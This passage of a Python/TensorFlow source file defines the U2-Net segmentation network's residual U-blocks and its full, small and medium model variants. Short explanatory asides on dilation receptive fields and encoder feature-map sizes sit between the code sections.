hx = MaxPool2D(pool_size=(2, 2))(hx3)
hx4 = conv_block(hx, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx4)
hx5 = conv_block(hx, mid_filters)
hx6 = conv_block(hx5, mid_filters, dirate=2)
hx5d = concatenate([hx6, hx5])
hx5d = conv_block(hx5d, mid_filters)
hx5dup = tf.compat.v1.image.resize_bilinear(hx5d, (tf.shape(hx4)[1], tf.shape(hx4)[2]), True)
hx4d = concatenate([hx5dup, hx4])
hx4d = conv_block(hx4d, mid_filters)
hx4dup = tf.compat.v1.image.resize_bilinear(hx4d, (tf.shape(hx3)[1], tf.shape(hx3)[2]), True)
hx3d = concatenate([hx4dup, hx3])
hx3d = conv_block(hx3d, mid_filters)
hx3dup = tf.compat.v1.image.resize_bilinear(hx3d, (tf.shape(hx2)[1], tf.shape(hx2)[2]), True)
hx2d = concatenate([hx3dup, hx2])
hx2d = conv_block(hx2d, mid_filters)
hx2dup = tf.compat.v1.image.resize_bilinear(hx2d, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
hx1d = concatenate([hx2dup, hx1])
hx1d = conv_block(hx1d, out_filters)
hxou = add([hxin, hx1d])
return hxou


def RSU5(inputs, out_filters=3, mid_filters=12):
hxin = conv_block(inputs, out_filters)
hx1 = conv_block(hxin, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx1)
hx2 = conv_block(hx, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx2)
hx3 = conv_block(hx, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx3)
hx4 = conv_block(hx, mid_filters)
hx5 = conv_block(hx4, mid_filters, dirate=2)
hx4d = concatenate([hx5, hx4])
hx4d = conv_block(hx4d, mid_filters)
hx4dup = tf.compat.v1.image.resize_bilinear(hx4d, (tf.shape(hx3)[1], tf.shape(hx3)[2]), True)
hx3d = concatenate([hx4dup, hx3])
hx3d = conv_block(hx3d, mid_filters)
hx3dup = tf.compat.v1.image.resize_bilinear(hx3d, (tf.shape(hx2)[1], tf.shape(hx2)[2]), True)
hx2d = concatenate([hx3dup, hx2])
hx2d = conv_block(hx2d, mid_filters)
hx2dup = tf.compat.v1.image.resize_bilinear(hx2d, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
hx1d = concatenate([hx2dup, hx1])
hx1d = conv_block(hx1d, out_filters)
hxou = add([hxin, hx1d])
return hxou


def RSU4(inputs, out_filters=3, mid_filters=12):
hxin = conv_block(inputs, out_filters)
hx1 = conv_block(hxin, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx1)
hx2 = conv_block(hx, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx2)
hx3 = conv_block(hx, mid_filters)
hx4 = conv_block(hx3, mid_filters, dirate=2)
hx3d = concatenate([hx4, hx3])
hx3d = conv_block(hx3d, mid_filters)
hx3dup = tf.compat.v1.image.resize_bilinear(hx3d, (tf.shape(hx2)[1], tf.shape(hx2)[2]), True)
hx2d = concatenate([hx3dup, hx2])
hx2d = conv_block(hx2d, mid_filters)
hx2dup = tf.compat.v1.image.resize_bilinear(hx2d, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
hx1d = concatenate([hx2dup, hx1])
hx1d = conv_block(hx1d, out_filters)
hxou = add([hxin, hx1d])
return hxou


def RSU4F(inputs, out_filters=3, mid_filters=12):
hxin = conv_block(inputs, out_filters) # shape=(None, 20, 20, 256)
hx1 = conv_block(hxin, mid_filters) # shape=(None, 20, 20, 512)
hx2 = conv_block(hx1, mid_filters, dirate=2) # shape=(None, 20, 20, 512)
hx3 = conv_block(hx2, mid_filters, dirate=4) # shape=(None, 20, 20, 512)
hx4 = conv_block(hx3, mid_filters, dirate=8) # shape=(None, 20, 20, 512)
hx3d = concatenate([hx4, hx3]) # shape=(None, 20, 20, 1024)
hx3d = conv_block(hx3d, mid_filters, dirate=4) # shape=(None, 20, 20, 512)
hx2d = concatenate([hx3d, hx2]) # shape=(None, 20, 20, 1024)
hx2d = conv_block(hx2d, mid_filters, dirate=2) # shape=(None, 20, 20, 512)
    hx1d = concatenate([hx2d, hx1])  # shape=(None, 20, 20, 1024)
hx1d = conv_block(hx1d, mid_filters, dirate=1) # shape=(None, 20, 20, 512)
hxou = add([hxin, hx1d])
return hxou
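RSU4F above differs from the other RSU blocks: instead of pooling, it stacks stride-1 3x3 convolutions with dilation rates 1, 2, 4 and 8, so the receptive field grows while the resolution stays fixed. A minimal sketch of that receptive-field arithmetic (the helper function is illustrative, not part of the model):

```python
# Each stride-1 conv with kernel k and dilation d widens the receptive
# field by (k - 1) * d. RSU4F stacks rates 1, 2, 4, 8, reaching 31x31,
# enough to cover its 20x20 or 10x10 inputs without any pooling.
def receptive_field(dilations, kernel=3):
    rf = 1
    for d in dilations:
        rf += (kernel - 1) * d
    return rf

print(receptive_field([1, 2, 4, 8]))  # 31
```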


def U2net(input_shape=(320, 320, 3), classes=2, activation='softmax'):
inputs = Input(shape=input_shape)
hx1 = RSU7(inputs, 32, 64) # shape=(None, 320, 320, 32)
hx = MaxPool2D(pool_size=(2, 2))(hx1) # shape=(None, 160, 160, 32)
hx2 = RSU6(hx, 32, 128) # shape=(None, 160, 160, 32)
hx = MaxPool2D(pool_size=(2, 2))(hx2) # shape=(None, 80, 80, 32)
hx3 = RSU5(hx, 64, 256) # shape=(None, 80, 80, 64)
hx = MaxPool2D(pool_size=(2, 2))(hx3) # shape=(None, 40, 40, 64)
hx4 = RSU4(hx, 128, 512) # shape=(None, 40, 40, 128)
hx = MaxPool2D(pool_size=(2, 2))(hx4) # shape=(None, 20, 20, 128)
hx5 = RSU4F(hx, 256, 256) # shape=(None, 20, 20, 256)
    hx = MaxPool2D(pool_size=(2, 2))(hx5)  # shape=(None, 10, 10, 256)
hx6 = RSU4F(hx, 512, 512) # shape=(None, 10, 10, 512)
hx6up = tf.compat.v1.image.resize_bilinear(hx6, (tf.shape(hx5)[1], tf.shape(hx5)[2]), True)
hx5d = concatenate([hx6up, hx5]) # shape=(None, 20, 20, 768)
hx5d = RSU4F(hx5d, 512, 512) # shape=(None, 20, 20, 512)
hx5up = tf.compat.v1.image.resize_bilinear(hx5d, (tf.shape(hx4)[1], tf.shape(hx4)[2]), True)
hx4d = concatenate([hx5up, hx4]) # shape=(None, 40, 40, 640)
hx4d = RSU4(hx4d, 128, 256) # shape=(None, 40, 40, 128)
hx4up = tf.compat.v1.image.resize_bilinear(hx4d, (tf.shape(hx3)[1], tf.shape(hx3)[2]), True)
hx3d = concatenate([hx4up, hx3]) # shape=(None, 80, 80, 192)
hx3d = RSU5(hx3d, 64, 128) # shape=(None, 80, 80, 64)
hx3up = tf.compat.v1.image.resize_bilinear(hx3d, (tf.shape(hx2)[1], tf.shape(hx2)[2]), True)
hx2d = concatenate([hx3up, hx2]) # shape=(None, 160, 160, 96)
hx2d = RSU6(hx2d, 32, 64) # shape=(None, 160, 160, 32)
hx2up = tf.compat.v1.image.resize_bilinear(hx2d, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
hx1d = concatenate([hx2up, hx1]) # shape=(None, 320, 320, 64)
hx1d = RSU7(hx1d, 16, 64)
d1 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(hx1d)
d2 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(hx2d)
d2 = tf.compat.v1.image.resize_bilinear(d2, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d3 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(hx3d)
d3 = tf.compat.v1.image.resize_bilinear(d3, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d4 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(hx4d)
d4 = tf.compat.v1.image.resize_bilinear(d4, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d5 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(hx5d)
d5 = tf.compat.v1.image.resize_bilinear(d5, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d = concatenate([d1, d2, d3, d4, d5])
d = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(d)
if activation in {'softmax', 'sigmoid'}:
d = Activation(activation, name='d')(d)
d1 = Activation(activation, name='d1')(d1)
d2 = Activation(activation, name='d2')(d2)
d3 = Activation(activation, name='d3')(d3)
d4 = Activation(activation, name='d4')(d4)
d5 = Activation(activation, name='d5')(d5)
'''
Total params: 94,339,965
Trainable params: 94,295,229
Non-trainable params: 44,736
'''
model = Model(inputs=inputs, outputs=[d, d1, d2, d3, d4, d5])
return model


def U2netS(input_shape=(320, 320, 3), classes=2, drop_rate=0.35, activation='softmax'):
inputs = Input(shape=input_shape)
hx1 = RSU7(inputs, 16, 64) # shape=(None, 320, 320, 16)
hx = MaxPool2D(pool_size=(2, 2))(hx1)
if drop_rate > 0.:
hx = Dropout(drop_rate)(hx)
hx2 = RSU6(hx, 16, 64) # shape=(None, 160, 160, 16)
hx = MaxPool2D(pool_size=(2, 2))(hx2)
if drop_rate > 0.:
hx = Dropout(drop_rate)(hx)
hx3 = RSU5(hx, 16, 64) # shape=(None, 80, 80, 16)
hx = MaxPool2D(pool_size=(2, 2))(hx3) # shape=(None, 40, 40, 16)
if drop_rate > 0.:
hx = Dropout(drop_rate)(hx)
hx4 = RSU4(hx, 16, 64) # shape=(None, 40, 40, 16)
hx = MaxPool2D(pool_size=(2, 2))(hx4)
hx5 = RSU4F(hx, 16, 16) # shape=(None, 20, 20, 16)
    hx = MaxPool2D(pool_size=(2, 2))(hx5)  # shape=(None, 10, 10, 16)
if drop_rate > 0.:
hx = Dropout(drop_rate)(hx)
hx6 = RSU4F(hx, 16, 16) # shape=(None, 10, 10, 16)
hx6up = tf.compat.v1.image.resize_bilinear(hx6, (tf.shape(hx5)[1], tf.shape(hx5)[2]), True)
hx5d = concatenate([hx6up, hx5])
hx5d = RSU4F(hx5d, 16, 16)
hx5up = tf.compat.v1.image.resize_bilinear(hx5d, (tf.shape(hx4)[1], tf.shape(hx4)[2]), True)
hx4d = concatenate([hx5up, hx4])
# if drop_rate>0.:
# hx4d=Dropout(drop_rate)(hx4d)
hx4d = RSU4(hx4d, 16, 64)
hx4up = tf.compat.v1.image.resize_bilinear(hx4d, (tf.shape(hx3)[1], tf.shape(hx3)[2]), True)
hx3d = concatenate([hx4up, hx3])
hx3d = RSU5(hx3d, 16, 64)
hx3up = tf.compat.v1.image.resize_bilinear(hx3d, (tf.shape(hx2)[1], tf.shape(hx2)[2]), True)
hx2d = concatenate([hx3up, hx2])
# if drop_rate>0.:
# hx2d=Dropout(drop_rate)(hx2d)
hx2d = RSU6(hx2d, 16, 64)
hx2up = tf.compat.v1.image.resize_bilinear(hx2d, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
hx1d = concatenate([hx2up, hx1])
# if drop_rate>0.:
# hx1d=Dropout(drop_rate)(hx1d)
hx1d = RSU7(hx1d, 16, 64)
d1 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(hx1d)
d2 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(hx2d)
d2 = tf.compat.v1.image.resize_bilinear(d2, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d3 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(
hx3d) # shape=(None, 80, 80, 1)
d3 = tf.compat.v1.image.resize_bilinear(d3, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d4 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(
hx4d) # shape=(None, 40, 40, 1)
d4 = tf.compat.v1.image.resize_bilinear(d4, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d5 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(
hx5d) # shape=(None, 20, 20, 1)
d5 = tf.compat.v1.image.resize_bilinear(d5, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d = concatenate([d1, d2, d3, d4, d5])
    d = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(d)
if activation in {'softmax', 'sigmoid'}:
d = Activation(activation, name='d')(d)
d1 = Activation(activation, name='d1')(d1)
d2 = Activation(activation, name='d2')(d2)
d3 = Activation(activation, name='d3')(d3)
d4 = Activation(activation, name='d4')(d4)
d5 = Activation(activation, name='d5')(d5)
'''
Total params: 3,738,541
Trainable params: 3,728,045
Non-trainable params: 10,496
'''
model = Model(inputs=inputs, outputs=[d, d1, d2, d3, d4, d5])
return model


def U2netM(input_shape=(320, 320, 3), classes=2, activation='softmax'):
inputs = Input(shape=input_shape)
hx1 = RSU7(inputs, 32, 64) # shape=(None, 320, 320, 32)
hx = MaxPool2D(pool_size=(2, 2))(hx1) # shape=(None, 160, 160, 32)
hx2 = RSU6(hx, 32, 64) # shape=(None, 160, 160, 32)
hx = MaxPool2D(pool_size=(2, 2))(hx2) # shape=(None, 80, 80, 32)
hx3 = RSU5(hx, 32, 128) # shape=(None, 80, 80, 32)
hx = MaxPool2D(pool_size=(2, 2))(hx3) # shape=(None, 40, 40, 64)
hx4 = RSU4(hx, 64, 128) # shape=(None, 40, 40, 64)
hx = MaxPool2D(pool_size=(2, 2))(hx4) # shape=(None, 20, 20, 128)
hx5 = RSU4F(hx, 128, 128) # shape=(None, 20, 20, 128)
    hx = MaxPool2D(pool_size=(2, 2))(hx5)  # shape=(None, 10, 10, 128)
hx6 = RSU4F(hx, 256, 256) # shape=(None, 10, 10, 256)
hx6up = tf.compat.v1.image.resize_bilinear(hx6, (tf.shape(hx5)[1], tf.shape(hx5)[2]), True)
# hx6up = UpSampling2D(size=(2, 2))(hx6) # shape=(None, 20, 20, 256)
hx5d = concatenate([hx6up, hx5]) # shape=(None, 20, 20, 384)
hx5d = RSU4F(hx5d, 256, 256) # shape=(None, 20, 20, 256)
hx5up = tf.compat.v1.image.resize_bilinear(hx5d, (tf.shape(hx4)[1], tf.shape(hx4)[2]), True)
# hx5up = UpSampling2D(size=(2, 2))(hx5d) # shape=(None, 40, 40, 512)
hx4d = concatenate([hx5up, hx4]) # shape=(None, 40, 40, 640)
hx4d = RSU4(hx4d, 128, 256) # shape=(None, 40, 40, 128)
hx4up = tf.compat.v1.image.resize_bilinear(hx4d, (tf.shape(hx3)[1], tf.shape(hx3)[2]), True)
# hx4up = UpSampling2D(size=(2, 2))(hx4d) # shape=(None, 80, 80, 128)
hx3d = concatenate([hx4up, hx3]) # shape=(None, 80, 80, 192)
hx3d = RSU5(hx3d, 32, 128) # shape=(None, 80, 80, 32)
hx3up = tf.compat.v1.image.resize_bilinear(hx3d, (tf.shape(hx2)[1], tf.shape(hx2)[2]), True)
# hx3up = UpSampling2D(size=(2, 2))(hx3d) # shape=(None, 160, 160, 64)
hx2d = concatenate([hx3up, hx2]) # shape=(None, 160, 160, 96)
hx2d = RSU6(hx2d, 32, 64) # shape=(None, 160, 160, 32)
hx2up = tf.compat.v1.image.resize_bilinear(hx2d, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
# hx2up = UpSampling2D(size=(2, 2))(hx2d) # shape=(None, 320, 320, 32)
hx1d = concatenate([hx2up, hx1]) # shape=(None, 320, 320, 64)
hx1d = RSU7(hx1d, 16, 64)
d1 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(hx1d)
d2 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(hx2d)
d2 = tf.compat.v1.image.resize_bilinear(d2, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d3 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(
hx3d) # shape=(None, 80, 80, 1)
d3 = tf.compat.v1.image.resize_bilinear(d3, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d4 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(
hx4d) # shape=(None, 40, 40, 1)
d4 = tf.compat.v1.image.resize_bilinear(d4, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d5 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(
hx5d) # shape=(None, 20, 20, 1)
d5 = tf.compat.v1.image.resize_bilinear(d5, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d = concatenate([d1, d2, d3, d4, d5])
d = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(d)
if activation in {'softmax', 'sigmoid'}:
d = Activation(activation, name='d')(d)
d1 = Activation(activation, name='d1')(d1)
d2 = Activation(activation, name='d2')(d2)
d3 = Activation(activation, name='d3')(d3)
d4 = Activation(activation, name='d4')(d4)
d5 = Activation(activation, name='d5')(d5)
'''
Total params: 26,829,661
Trainable params: 26,803,613
Non-trainable params: 26,048
'''
model = Model(inputs=inputs, outputs=[d, d1, d2, d3, d4, d5])
return model


if __name__ == "__main__":
import os
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
model1 = U2net(input_shape=(320, 320, 3))
model1.summary()
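All three variants share the same encoder layout: the spatial resolution is halved five times by `MaxPool2D(pool_size=(2, 2))` before the decoder resizes back up with bilinear interpolation. A minimal sketch of the resulting feature-map sizes (pure Python, no TensorFlow needed; the helper name is my own):

```python
# Spatial size after each of the five MaxPool2D(pool_size=(2, 2)) stages,
# starting from the default 320x320 input of U2net / U2netS / U2netM.
def encoder_sizes(size, stages=5):
    sizes = [size]
    for _ in range(stages):
        size //= 2
        sizes.append(size)
    return sizes

print(encoder_sizes(320))  # [320, 160, 80, 40, 20, 10]
```

Because the decoder recovers each size via `tf.shape` of the matching encoder tensor rather than a fixed `UpSampling2D`, other input sizes work too, as long as each stage's size stays even.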